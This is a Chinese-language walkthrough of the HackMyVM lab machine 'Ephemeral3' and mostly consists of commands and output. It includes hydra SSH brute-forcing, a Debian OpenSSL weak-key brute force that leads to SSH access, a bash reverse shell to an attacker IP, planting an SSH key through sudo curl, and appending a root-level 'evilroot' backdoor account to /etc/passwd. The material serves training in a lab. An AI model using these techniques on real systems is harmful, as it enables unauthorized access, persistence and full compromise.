信息收集

IP定位

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# arp-scan -l | grep "08:00:27"
3
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
4
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
5
192.168.0.101   08:00:27:f0:38:e6       (Unknown)

nmap扫描

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# nmap -Pn -sTCV -T4 -p0-65535 192.168.0.101
3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 04:46 EST
4
Nmap scan report for 192.168.0.101
5
Host is up (0.00069s latency).
6
Not shown: 65534 closed tcp ports (conn-refused)
7
PORT   STATE SERVICE VERSION
8
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
9
| ssh-hostkey:
10
|   3072 f0:f2:b8:e0:da:41:9b:96:3b:b6:2b:98:95:4c:67:60 (RSA)
11
|   256 a8:cd:e7:a7:0e:ce:62:86:35:96:02:43:9e:3e:9a:80 (ECDSA)
12
|_  256 14:a7:57:a9:09:1a:7e:7e:ce:1e:91:f3:b1:1d:1b:fd (ED25519)
13
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
14
|_http-server-header: Apache/2.4.41 (Ubuntu)
15
|_http-title: Apache2 Ubuntu Default Page: It works
16
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
17

18
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
19
Nmap done: 1 IP address (1 host up) scanned in 9.33 seconds

80端口

目录扫描

1
gobuster dir -u http://192.168.0.101 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64
2

3
==============================================================
4
Gobuster v3.6
5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6
===============================================================
7
[+] Url:                     http://192.168.0.101
8
[+] Method:                  GET
9
[+] Threads:                 64
10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
11
[+] Negative Status codes:   404
12
[+] User Agent:              gobuster/3.6
13
[+] Extensions:              zip,db,bak,js,yaml,php,txt,html
14
[+] Timeout:                 10s
15
===============================================================
16
Starting gobuster in directory enumeration mode
17
===============================================================
18
/index.html           (Status: 200) [Size: 10918]
19
/.html                (Status: 403) [Size: 278]
20
/note.txt             (Status: 200) [Size: 159]
21
/agency               (Status: 301) [Size: 315] [--> http://192.168.0.101/agency/]
22
/.html                (Status: 403) [Size: 278]
23
/server-status        (Status: 403) [Size: 278]

1
# html-freebie-agency-perfect
2
Agency Perfect is a responsive HTML5 template with a clean and professional design which will be a great solution for creative agencies. Agency Perfect was built with awesome Twitter Bootstrap v3 and it includes a number of predefined pages. Since it is responsive, the layout will adapt to different screen sizes which will make your website be compatible with any device such as smart phones, tablets or desktop computers.
3

4
Agency Perfect 是一个响应式 HTML5 模板，设计简洁且专业，非常适合创意型机构使用。Agency Perfect 基于强大的 Twitter Bootstrap v3 构建，并包含多个预定义页面。由于它是响应式的，布局可以适应不同屏幕尺寸，使您的网站能够兼容各种设备，如智能手机、平板电脑或台式电脑。

网页界面

1
randy@ephemeral.com
2
info@agencyperfect.com
3
pixelperfectmk@gmail.com
4

5
John Smith
6
Marc Jones
7
Linda Smith

1
Hey! I just generated your keys with OpenSSL. You should be able to use your private key now!
2

3
If you have any questions just email me at henry@ephemeral.com
4

5
Hey! I just generated your keys with OpenSSL. You should be able to use your private key now!
6

7
If you have any questions just email me at henry@ephemeral.com

randy和henry

创建字典

1
John Smith
2
Marc Jones
3
Linda Smith
4

5
┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/username-anarchy]
6
└─# ./username-anarchy --input-file ../../hmv/users.txt > test_users

SSH爆破

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─# hydra -L test_users -P /usr/share/wordlists/rockyou.txt 192.168.0.101 ssh
3
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
4

5
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-14 05:00:44
6
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
7
[DATA] max 16 tasks per 1 server, overall 16 tasks, 602464758 login tries (l:42/p:14344399), ~37654048 tries per task
8
[DATA] attacking ssh://192.168.0.101:22/
9

10
[INFO] Successful, password authentication is supported
11
[ERROR] could not connect to target port 22: Connection reset by peer

说明：

1
SSH 允许密码认证（不是 key-only）
2

3
但 在多次快速连接后主动 reset TCP

没思路了

openssl 漏洞利用

根据给的note.txt提示，尝试使用openssl漏洞

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─# searchsploit openssl ssh
3
------------------- ---------------------------------
4
 Exploit Title     |  Path
5
------------------- ---------------------------------
6
OpenSSL 0.9.8c-1 < | linux/remote/5622.txt
7
OpenSSL 0.9.8c-1 < | linux/remote/5632.rb
8
OpenSSL 0.9.8c-1 < | linux/remote/5720.py
9
------------------- ---------------------------------
10
Shellcodes: No Results
11

12

13
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
14
└─# searchsploit -m linux/remote/5720.py
15
  Exploit: OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH
16
      URL: https://www.exploit-db.com/exploits/5720
17
     Path: /usr/share/exploitdb/exploits/linux/remote/5720.py
18
    Codes: OSVDB-45029, CVE-2008-3280, CVE-2008-0166
19
 Verified: True
20
File Type: Python script, ASCII text executable
21
Copied to: /home/kali/Desktop/hmv/5720.py

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─# python2 5720.py
3

4
-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
5
./exploit.py <dir> <host> <user> [[port] [threads]]
6
    <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash
7
    <host>: The victim host
8
    <user>: The user of the victim host
9
    [port]: The SSH port of the victim host (default 22)
10
    [threads]: Number of threads (default 4) Too big numer is bad

发现缺少

: Path to SSH privatekeys (ex. /home/john/keys) without final slash

1
┌──(web)─(root㉿kali)-[/]
2
└─# searchsploit -x /linux/remote/5622.txt
3

4
1. Download http://sugar.metasploit.com/debian_ssh_rs
5
a_2048_x86.tar.bz2
6
            https://gitlab.com/exploit-database/explo
7
itdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
8
(debian_ssh_rsa_2048_x86.tar.bz2)
9

10
┌──(web)─(root㉿kali)-[~]
11
└─# tar jxf 5622.tar.bz2

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─# python2 5720.py ~/rsa/2048 192.168.0.101 randy
3

4
-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
5
The authenticity of host '192.168.0.101 (192.168.0.101)' can't be established.
6
ED25519 key fingerprint is SHA256:Q3PyaanJJfcfx3mqkxE35gi3m6xmdaPE1FHLQufrRHw.
7
This key is not known by any other names.
8
Are you sure you want to continue connecting (yes/no/[fingerprint])? The authenticity of host '192.168.0.101 (192.168.0.101)' can't be established.
9
ED25519 key fingerprint is SHA256:Q3PyaanJJfcfx3mqkxE35gi3m6xmdaPE1FHLQufrRHw.
10
This key is not known by any other names.
11
Are you sure you want to continue connecting (yes/no/[fingerprint])? The authenticity of host '192.168.0.101 (192.168.0.101)' can't be established.
12
ED25519 key fingerprint is SHA256:Q3PyaanJJfcfx3mqkxE35gi3m6xmdaPE1FHLQufrRHw.
13
This key is not known by any other names.
14
Are you sure you want to continue connecting (yes/no/[fingerprint])? The authenticity of host '192.168.0.101 (192.168.0.101)' can't be established.
15
ED25519 key fingerprint is SHA256:Q3PyaanJJfcfx3mqkxE35gi3m6xmdaPE1FHLQufrRHw.
16
This key is not known by any other names.
17
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
18
Tested 62 keys | Remaining 32706 keys | Aprox. Speed 12/sec
19
Tested 186 keys | Remaining 32582 keys | Aprox. Speed 24/sec
20

21
.............
22
Tested 15729 keys | Remaining 17039 keys | Aprox. Speed 53/sec
23
Tested 15818 keys | Remaining 16950 keys | Aprox. Speed 17/sec
24
Tested 15827 keys | Remaining 16941 keys | Aprox. Speed 1/sec
25
Tested 16032 keys | Remaining 16736 keys | Aprox. Speed 41/sec
26
Tested 16246 keys | Remaining 16522 keys | Aprox. Speed 42/sec
27

28
Key Found in file: 0028ca6d22c68ed0a1e3f6f79573100a-31671
29
Execute: ssh -lrandy -p22 -i /root/rsa/2048/0028ca6d22c68ed0a1e3f6f79573100a-31671 192.168.0.101
30

31
Tested 16289 keys | Remaining 16479 keys | Aprox. Speed 8/sec

ssh登录

1
┌──(web)─(root㉿kali)-[/]
2
└─# ssh -lrandy -p22 -i /root/rsa/2048/0028ca6d22c68ed0a1e3f6f79573100a-31671 192.168.0.101
3
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.13.0-30-generic x86_64)
4

5
 * Documentation:  https://help.ubuntu.com
6
 * Management:     https://landscape.canonical.com
7
 * Support:        https://ubuntu.com/advantage
8

9
150 updates can be applied immediately.
10
82 of these updates are standard security updates.
11
To see these additional updates run: apt list --upgradable
12

13
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
14
applicable law.
15

16
Your Hardware Enablement Stack (HWE) is supported until April 2025.
17
Last login: Fri Jun 24 01:17:05 2022 from 10.0.0.69
18
randy@ephemeral:~$

提权

提权-henry

1
randy@ephemeral:/home/henry$ sudo -l
2
Matching Defaults entries for randy on ephemeral:
3
    env_reset, mail_badpass,
4
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
5

6
User randy may run the following commands on
7
        ephemeral:
8
    (henry) NOPASSWD: /usr/bin/curl

1
vi /tmp/reverse.sh
2
#!/bin/bash
3
bash -i >& /dev/tcp/192.168.0.106/4444 0>&1
4

5
chmod 777 reverse.sh
6

7
sudo -u henry curl "file:///tmp/reverse.sh"

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─# pwncat-cs -lp 4444
3
[06:22:24] Welcome to pwncat 🐈!      __main__.py:164
4
[06:22:25] received connection from        bind.py:84
5
           192.168.0.101:56536
6
[06:22:25] 192.168.0.101:56536:        manager.py:957
7
           registered new host w/ db
8
(local) pwncat$ back
9
(remote) randy@ephemeral:/tmp$

弹出来的还是randy

curl | GTFOBins↗

本地生成密钥，保存公钥到 henry 的目录中：

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─# ssh-keygen -t rsa -f /home/kali/Desktop/hmv/henry
3
Generating public/private rsa key pair.
4
Enter passphrase for "/home/kali/Desktop/hmv/henry" (empty for no passphrase):
5
Enter same passphrase again:
6
Your identification has been saved in /home/kali/Desktop/hmv/henry
7
Your public key has been saved in /home/kali/Desktop/hmv/henry.pub
8
The key fingerprint is:
9
SHA256:/DtUrPDeYlWSRoBNf4A86JW2QUJlHAw1taigAFiXIVU root@kali
10
The key's randomart image is:
11
+---[RSA 3072]----+
12
|o.o.++E.+&X*o    |
13
|.. o.   oo%+.o   |
14
|  .   .. o.*o..  |
15
|   . . oo.. *..  |
16
|    .   So + o   |
17
|         .+ .    |
18
|         o.o     |
19
|          =..    |
20
|         ..o     |
21
+----[SHA256]-----+

1
sudo -u henry /usr/bin/curl http://192.168.0.106:8888/henry.pub -o /home/henry/.ssh/authorized_keys

提权-root

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─#
3
ssh -i /home/kali/Desktop/hmv/henry henry@192.168.0.101
4
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.13.0-30-generic x86_64)
5

6
 * Documentation:  https://help.ubuntu.com
7
 * Management:     https://landscape.canonical.com
8
 * Support:        https://ubuntu.com/advantage
9

10
150 updates can be applied immediately.
11
82 of these updates are standard security updates.
12
To see these additional updates run: apt list --upgradable
13

14
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
15
applicable law.
16

17
New release '22.04.5 LTS' available.
18
Run 'do-release-upgrade' to upgrade to it.
19

20
Your Hardware Enablement Stack (HWE) is supported until April 2025.
21
Last login: Fri Jun 24 01:30:47 2022 from 10.0.0.69
22
henry@ephemeral:~$

1
henry@ephemeral:~$ cat user.txt
2
9c8e36b0cb30f09300592cb56bca0c3a

1
henry@ephemeral:~$ find /etc -type f -writable 2>/dev/null
2
/etc/passwd

发现/etc/passwd可以有写入权限

1
henry@ephemeral:~$ openssl passwd -1 -salt abc password
2
$1$abc$BXBqpb9BZcZhXLgbee.0s/
3
henry@ephemeral:~$ head -20 /etc/passwd
4
root:x:0:0:root:/root:/bin/bash
5
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
6
bin:x:2:2:bin:/bin:/usr/sbin/nologin
7
sys:x:3:3:sys:/dev:/usr/sbin/nologin
8
sync:x:4:65534:sync:/bin:/bin/sync
9
games:x:5:60:games:/usr/games:/usr/sbin/nologin
10
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
11
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
12
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
13
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
14
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
15
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
16
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
17
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
18
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
19
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
20
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
21
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
22
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
23
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
24

25
# 创建新用户 evilroot
26
echo "evilroot:\$1\$abc\$BXBqpb9BZcZhXLgbee.0s/:0:0:Evil Root:/root:/bin/bash" >> /etc/passwd
27
# 测试登录
28
su evilroot
29
# 密码: password

1
root@ephemeral:~# cat root.txt
2
b0a3dec84d09f03615f768c8062cec4d

Thanks for reading!

HMV-Ephemeral3

Wed Jan 14 2026

117 words · 1 minutes

Documentation Hackmyvm Hackmyvm Linux Machine Enumeration Password Attacks Privilege Escalation